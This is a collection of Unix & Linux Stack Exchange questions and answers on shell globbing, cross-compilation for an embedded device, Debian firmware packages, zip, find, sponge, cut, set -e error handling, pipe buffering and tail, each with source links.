556,545 | I'm doing some stuff with audio files, most but not all of which are mp3 files. Now I want to run some commands on only the files which are not mp3 files, or only those which don't have a .mp3 extension. I consider myself pretty good at regular expressions, but not so much at file globbing, which is subtly different in unexpected ways. I looked around and learned from other SO & SE answers that Bash has "extended globbing" that allows me to do this: file ../foo/bar/*.!(mp3) But some of my filenames have dots in them besides the one forming the filename extension: ../foo/bar/Naked_Scientists_Show_19.10.15.mp3
../foo/bar/YWCS_ep504-111519-pt1_5ej4_41cc9320.mp3_42827d48daefaa81ec09202e67fa8461_24419113.mp3
../foo/bar/eLife_Podcast_19.09.26.mp3
../foo/bar/gdn.sci.080428.bg.science_weekly.mp3 It seems the glob matches from the first dot onward, rather than from the last dot. I looked at the documentation but it seems they are far less powerful than regexes. But I didn't really grok everything as I don't spend that much time on *nix shells. Have I missed some way that I can still do this with Bash globbing? If not, a way to achieve the same thing with find or some other tool would still be worth knowing. | *.!(mp3) matches on foo.bar.mp3 because that's foo. followed by bar.mp3 which is not mp3 . You want !(*.mp3) here, which matches anything that doesn't end in .mp3 . If you want to match files whose name contains at least one . (other than a leading one which would make them a hidden file) but don't end in .mp3 , you could do !(*.mp3|!(*.*)) . In any case, note that unless your bash was built with --enable-extended-glob-default , you'll need to shopt -s extglob for that ksh glob operator to be available. | {
"source": [
"https://unix.stackexchange.com/questions/556545",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/6648/"
]
} |
556,677 | I purchased a Human Machine Interface (Exor Esmart04). It runs Linux 3.10.12, but this Linux is stripped down and does not have a C compiler. Another problem is disk space: I've tried to install GCC on it but I do not have enough disk space for this. Does anyone have other solutions, or other C compilers which require less disk space? | Usually, for an embedded device, one doesn't compile software directly on it. It's more practical to do what is called cross-compilation, which is, in short, compiling on your regular PC for the device's (non-x86) architecture. You said you're new to Linux; just for your information, you're facing a huge problem: cross-compiling for embedded devices is not an easy job. I researched your HMI system and noticed some results mentioning Yocto. Yocto is, in short, a whole framework for building firmware for embedded devices. Since your HMI massively uses Open Source projects (Linux, probably busybox, etc.), the manufacturer must provide you with a way to rebuild all the open source components yourself.
Usually, what you need for that is the BSP (Board Support Package).
Hardware manufacturers usually ship it in one of these forms: a Buildroot project that allows you to rebuild your whole firmware from scratch; a Yocto meta-layer that, added to a fresh copy of the corresponding Yocto project, will allow you to rebuild your whole firmware too; or, more rarely, a bunch of crappy scripts and a pre-built compiler. So, if I were you, I would: contact the manufacturer's support to ask for the material needed to rebuild the firmware, as implied by the use of Open Source; and, in parallel, search Google for "your HMI + yocto", "your HMI + buildroot", etc. After Googling some more, I found a Yocto meta-layer on GitHub. You can check the machines implemented by this layer in its conf/machine directory. There are currently five machines defined under the following codenames: us01-kit us02-kit us03-kit usom01 usom02 So I suggest that you dig into this. This is probably the way you can build software by yourself.
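To make the cross-compilation idea concrete, here is a minimal sketch that is not from the original answer: it assumes the HMI is ARM-based with a hard-float ABI (to be confirmed from the BSP), uses Debian/Ubuntu package names on the development PC, and uses a placeholder <hmi-ip>; in practice a toolchain generated from the vendor's Yocto or Buildroot BSP is the reliable choice because it matches the device's C library:
# all of this runs on the development PC, not on the HMI
sudo apt install gcc-arm-linux-gnueabihf
arm-linux-gnueabihf-gcc -static -o hello hello.c   # static linking sidesteps libc mismatches for a first test
scp hello root@<hmi-ip>:/tmp/ && ssh root@<hmi-ip> /tmp/hello
Whether such a generic binary actually runs depends on the device's kernel and architecture, which is another reason to prefer the SDK produced by the BSP.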
You can also check this page on the github account that may give you some more clues. | {
"source": [
"https://unix.stackexchange.com/questions/556677",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/385559/"
]
} |
556,946 | I am getting these warnings every time I update my initramfs image(-s) with update-initramfs on my Dell PowerEdge T20 server running GNU/Linux Debian Buster 10.0. Is there a fix? W: Possible missing firmware /lib/firmware/i915/bxt_dmc_ver1_07.bin for module i915
W: Possible missing firmware /lib/firmware/i915/skl_dmc_ver1_27.bin for module i915
W: Possible missing firmware /lib/firmware/i915/kbl_dmc_ver1_04.bin for module i915
W: Possible missing firmware /lib/firmware/i915/cnl_dmc_ver1_07.bin for module i915
W: Possible missing firmware /lib/firmware/i915/glk_dmc_ver1_04.bin for module i915
W: Possible missing firmware /lib/firmware/i915/kbl_guc_ver9_39.bin for module i915
W: Possible missing firmware /lib/firmware/i915/bxt_guc_ver9_29.bin for module i915
W: Possible missing firmware /lib/firmware/i915/skl_guc_ver9_33.bin for module i915
W: Possible missing firmware /lib/firmware/i915/kbl_huc_ver02_00_1810.bin for module i915
W: Possible missing firmware /lib/firmware/i915/bxt_huc_ver01_07_1398.bin for module i915
W: Possible missing firmware /lib/firmware/i915/skl_huc_ver01_07_1398.bin for module i915 | For a general solution, apt-file is your way to solve the Possible missing firmware... warning. E.g.: apt-file search bxt_dmc
firmware-misc-nonfree: /lib/firmware/i915/bxt_dmc_ver1.bin
firmware-misc-nonfree: /lib/firmware/i915/bxt_dmc_ver1_07.bin Showing that the package firmware-misc-nonfree provides the missing firmware. Installing the firmware-linux package solves the problem because firmware-linux depends on firmware-linux-nonfree which depends on firmware-misc-nonfree . Detailed instructions: Add non-free to your /etc/apt/sources.list : deb http://deb.debian.org/debian buster main contrib non-free
deb http://deb.debian.org/debian-security/ buster/updates main contrib non-free
deb http://deb.debian.org/debian buster-updates main contrib non-free Install apt-file : sudo apt update
sudo apt install apt-file
sudo apt-file update Debian: apt-file | {
"source": [
"https://unix.stackexchange.com/questions/556946",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/126755/"
]
} |
557,800 | Normally, to zip a directory, I can do something like this: zip -r archive.zip directory/ However, if I try to remove the extension from archive.zip like this: zip -r archive directory/ It implicitly appends the .zip extension to the output. Is there a way to do this without creating a .zip and then renaming it? I'm using this version of zip on Ubuntu 18.04: Copyright (c) 1990-2008 Info-ZIP - Type 'zip "-L"' for software license.
This is Zip 3.0 (July 5th 2008), by Info-ZIP. | The -A ( --adjust-sfx ) option causes zip to treat the given archive name as-is: zip -Ar archive directory/ This works even when archive isn’t created as a self-extracting archive. | {
"source": [
"https://unix.stackexchange.com/questions/557800",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/279720/"
]
} |
557,822 | I thought this would do the trick: find src -type f -regextype egrep -regex '.*(?<!\.d)\.ts' But it doesn't seem to be matching anything. I think that should work, but I guess this "egrep" flavor doesn't support negative lookbehinds unless I didn't escape something properly. For reference, % find src -type f
src/code-frame.d.ts # <-- I want to filter this out
src/foo.ts
src/index.ts Is there another quick way to filter out .d.ts files from my search results? % find --version
find (GNU findutils) 4.7.0-git | I don't believe egrep supports that syntax (your expression is a Perl compatible regular expression). But you don't need to use regular expressions in your example, just have multiple -name tests and apply a ! negation as appropriate: find src -type f -name '*.ts' ! -name '*.d.ts' | {
"source": [
"https://unix.stackexchange.com/questions/557822",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/45556/"
]
} |
558,773 | One might think that echo foo >a
cat a | rev >a would leave a containing oof ; but instead it is left empty. Why? How would one otherwise apply rev to a ? | There's an app for that! The sponge command from moreutils is designed for precisely this. If you are running Linux, it is likely already installed, if not search your operating system's repositories for sponge or moreutils . Then, you can do: echo foo >a
cat a | rev | sponge a Or, avoiding the UUoC : rev a | sponge a The reason for this behavior is down to the order in which your commands are run. The > a is actually the very first thing executed and > file empties the file. For example: $ echo "foo" > file
$ cat file
foo
$ > file
$ cat file
$ So, when you run cat a | rev >a what actually happens is that the > a is run first, emptying the file, so when the cat a is executed the file is already empty. This is precisely why sponge was written (from man sponge , emphasis mine): sponge reads standard input and writes it out to the specified file. Unlike a shell redirect, sponge soaks up all its input before writing
the output file. This allows constructing pipelines that read from and
write to the same file. | {
"source": [
"https://unix.stackexchange.com/questions/558773",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/134690/"
]
} |
559,236 | I am able to filter out jobs which got stuck in our queueing system with: > qjobs | grep "racon"
5240703 racon-3/utg001564l-racon-3.fasta H 1 1 0 10.0 0.0 150 :03
5241418 racon-3/utg002276l-racon-3.fasta H 1 1 0 10.0 0.0 150 :02
5241902 racon-3/utg002759l-racon-3.fasta H 1 1 0 10.0 0.0 150 :03
5242060 racon-3/utg002919l-racon-3.fasta H 1 1 0 10.0 0.0 150 :04
5242273 racon-3/utg003133l-racon-3.fasta H 1 1 0 10.0 0.0 150 :03
5242412 racon-3/utg003270l-racon-3.fasta H 1 1 0 10.0 0.0 150 :04
5242466 racon-3/utg003325l-racon-3.fasta H 1 1 0 10.0 0.0 150 :03 However, qjobs | grep "racon" | cut -d " " -f2 did not return e.g. racon-3/utg003325l-racon-3.fasta . What did I miss? | Every space counts towards the field number, even leading and consecutive ones. Hence, you need to use -f9 instead of -f2 . Alternatively, you can use awk '{ print $2 }' in place of the cut command entirely. | {
"source": [
"https://unix.stackexchange.com/questions/559236",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/34872/"
]
} |
559,407 | Most Linux guides consist of pages like
"you need to run command_1 , then command_2 , then command_3 " etc. Since I don't want to waste my time running all of them manually, I'd rather create a script command_1
command_2
command_3 and run it once. But, more often than not, some commands will fail, and I will have no idea, which commands have failed. Also, usually all the rest commands make no sense if something failed earlier. So a better script would be something like (command_1 && echo OK command_1 || (echo FAILED command_1; false) )
&& (command_2 && echo OK command_2 || (echo FAILED command_2; false) )
&& (command_3 && echo OK command_3 || (echo FAILED command_3; false) )
&& echo DONE
|| echo FAILED But it requires to write too much boilerplate code, repeat each command 3 times, and there is too high chance, that I mistype some of the braces. Is there a more convenient way of doing what the last script does? In particular: run commands sequentially break if any command fails write, what command has failed, if any Allows normal interactions with commands: prints all output, and allows input from keyboard, if command asks anything. Answers summary (2 January 2020) There are 2 types of solutions: Those, that allow to copy-paste commands from guide without modifications, but they don't print the failed command in the end. So, if failed command produced a very long output, you will have to scroll a lot of lines up, to see, what command has failed. (All top answers) Those, that print the failed command in the last line, but require you to modify commands after copy-pasting them, either by adding quotations (answer by John), or by adding try statements and splitting chained commands into separate ones (answer by Jasen). You rock folks, but I'll leave this question opened for a while. Maybe someone knows a solution that satisfies both needs (print failed command on the last line & allow copy-pasting of commands without their modifications). | One option would be to put the commands in a bash script, and start it with set -e . This will cause the script to terminate early if any command exits with non-zero exit status. See also this question on stack overflow: https://stackoverflow.com/q/19622198/828193 To print the error, you could use trap 'do_something' ERR Where do_something is a command you would create to show the error. Here is an example of a script to see how it works: #!/bin/bash
set -e
trap 'echo "******* FAILED *******" 1>&2' ERR
echo 'Command that succeeds' # this command works
ls non_existent_file # this should fail
echo 'Unreachable command' # and this is never called
# due to set -e And this is the output: $ ./test.sh
Command that succeeds
ls: cannot access 'non_existent_file': No such file or directory
******* FAILED ******* Also, as mentioned by @jick , keep in mind that the exit status of a pipeline is by default the exit status of the final command in it. This means that if a non-final command in the pipeline fails, that won't be caught by set -e . To fix this problem if you are concerned with it, you can use set -o pipefail As suggested by @glenn jackman and @Monty Harder , using a function as the handler can make the script more readable, since it avoids nested quoting. Since we are using a function anyway now, I removed set -e entirely, and used exit 1 in the handler, which could also make it more readable for some: #!/bin/bash
error_handler() {
echo "******* FAILED *******" 1>&2
exit 1
}
trap error_handler ERR
echo 'Command that succeeds' # this command works
ls non_existent_file # this should fail
echo 'Unreachable command' # and this is never called
# due to the exit in the handler The output is identical as above, though the exit status of the script is different. | {
"source": [
"https://unix.stackexchange.com/questions/559407",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/144004/"
]
} |
559,413 | If there's only 1 user on a system with sudo permission, can another program that ran by the user get root permission without the user knowing it if it has the sudo password? | | {
"source": [
"https://unix.stackexchange.com/questions/559413",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/388150/"
]
} |
559,985 | I want to tar a directory and write the result to stdout , then pipe it to a compression program, like this: tar -cvf - /tmp/source-dir | lzip -o /media/my-usb/result.lz - I have been using pipe all the time with commands which output several lines of text. Now I am wondering what would happen when I pipes a (fast) command with very large output such as tar and a very slow compression command followed? Will tar wait for its output to be consumed by lzip ? Or it just does as fast as it can then outputs everything to RAM? It will be a disaster in low RAM system if the latter is true. | When the data producer ( tar ) tries to write to the pipe too quickly for the consumer ( lzip ) to have time to read all of it, it will block until lzip has had time to read what tar is writing. There is a small buffer associated with the pipe, but its size is likely to be smaller than the size of most tar archives. There is no risk of filling up your system's RAM with your pipeline. "Blocking" simply means that when tar does a call to the write() library function (or equivalent), the call won't return until the data has been delivered to the pipe buffer, which could take a bit of time if lzip is slow to read from that same buffer. You should be able to see this in top where tar would slow down and sleep a lot compared to lzip (assuming tar is in fact quicker than lzip ). You would therefore not fill up a significant amount of RAM with your pipeline. To do that (if you wanted to), you could use something like pv in the middle, with some large buffer (here, a gigabyte): tar -cvf - /tmp/source-dir | pv --buffer-size 1G | lzip -o /media/my-usb/result.lz - This would still block tar whenever pv blocks. pv would block when its buffer is full and it can't write to lzip . The reverse situation works in a similar way, i.e. if you have a slow left-hand side of a pipe writing to a fast right-hand side, the consumer on the right would block on read() until there is data to be read from the pipe. This (data I/O) is the only thing that synchronises the processes taking part in a pipeline. Apart from reading and writing (and occasionally blocking while waiting for someone else to read or write), they would run independently of each other. | {
"source": [
"https://unix.stackexchange.com/questions/559985",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/352053/"
]
} |
561,322 | Here is the issue, I would like to count the number of jobs I have in the hpc, but it is not one of the readily provided features. So I made this simple script squeue -u user_name | wc -l where squeue prints all the jobs like the following > squeue -u user_name
JOBID PARTITION NAME USER ST TIME NODES NODELIST(REASON)
8840441 theory cteq fxm PD 0:00 1 (Resources)
8840442 theory cteq fxm PD 0:00 1 (Priority)
8840443 theory cteq fxm PD 0:00 1 (Priority)
8840444 theory cteq fxm PD 0:00 1 (Priority) which would be piped to wc and the number of lines would be counted. However, the first line is not an entry of the job. How may I instruct wc to skip the first line when counting? Or should I just take the output of wc and minus one to it? Thanks in advance! | There are many many ways to do this, the first I thought of was: squeue -u user_name | tail -n +2 | wc -l From the man page for tail : -n, --lines=[+]NUM output the last NUM lines, instead of the last 10;
or use -n +NUM to output starting with line NUM So for you -n +2 should skip the first line. You can also use the short form of tail: tail +2 | {
"source": [
"https://unix.stackexchange.com/questions/561322",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/376814/"
]
} |